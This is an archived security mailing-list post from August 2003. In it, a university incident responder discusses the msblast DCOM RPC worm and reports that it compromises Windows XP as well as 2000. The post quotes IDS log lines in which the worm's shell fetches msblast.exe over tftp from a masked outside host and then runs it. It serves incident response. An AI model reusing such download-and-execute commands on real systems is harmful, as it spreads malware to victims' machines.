[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Message-ID: <Pine.LNX.4.55.0308111924490.26208@afybt.areqp.hsy.rqh>
From: jwiens at nersp.nerdc.ufl.edu (Jordan Wiens)
Subject: DCOM Worm?
On Mon, 11 Aug 2003, Carl Sager wrote:
> Aha! The worm is using the 2k offsets and corrupts
> the DCOM RPC service on XP, which makes the OS
> automatically shut down after 1 minute. Patch up or
> use a firewall (or well, just tell any ignorant end
> users to do so) and you'll be good!
You sure about that? I'm seeing it compromise XP hosts as well. Maybe it
randomly switches between offsets?
In fact, IDS logs from our first compromised host:
Microsoft Windows XP [Version 5.1.2600]Microsoft Windows XP [Version
5.1.2600]tftp -i aaa.bbb.ccc.ddd GET msblast.exe{A}
{D}{A}
(C) Copyright 1985-2001 Microsoft Corp.{D}{A}
{D}{A}
C:\WINDOWS\System32>tftp -i aaa.bbb.ccc.ddd GET msblast.exe{A}
{D}{A}
(C) Copyright 1985-2001 Microsoft Corp.{D}{A}
{D}{A}
C:\WINDOWS\System32>tftp -i aaa.bbb.ccc.ddd GET msblast.exe{A}
tftp -i aaa.bbb.ccc.ddd GET msblast.exe{A}
start msblast.exe{A}
start msblast.exe{A}
msblast.exe{A}
msblast.exe{A}
--
Jordan Wiens, CISSP
UF Network Incident Response Team
(352)392-2061
Powered by blists - more mailing lists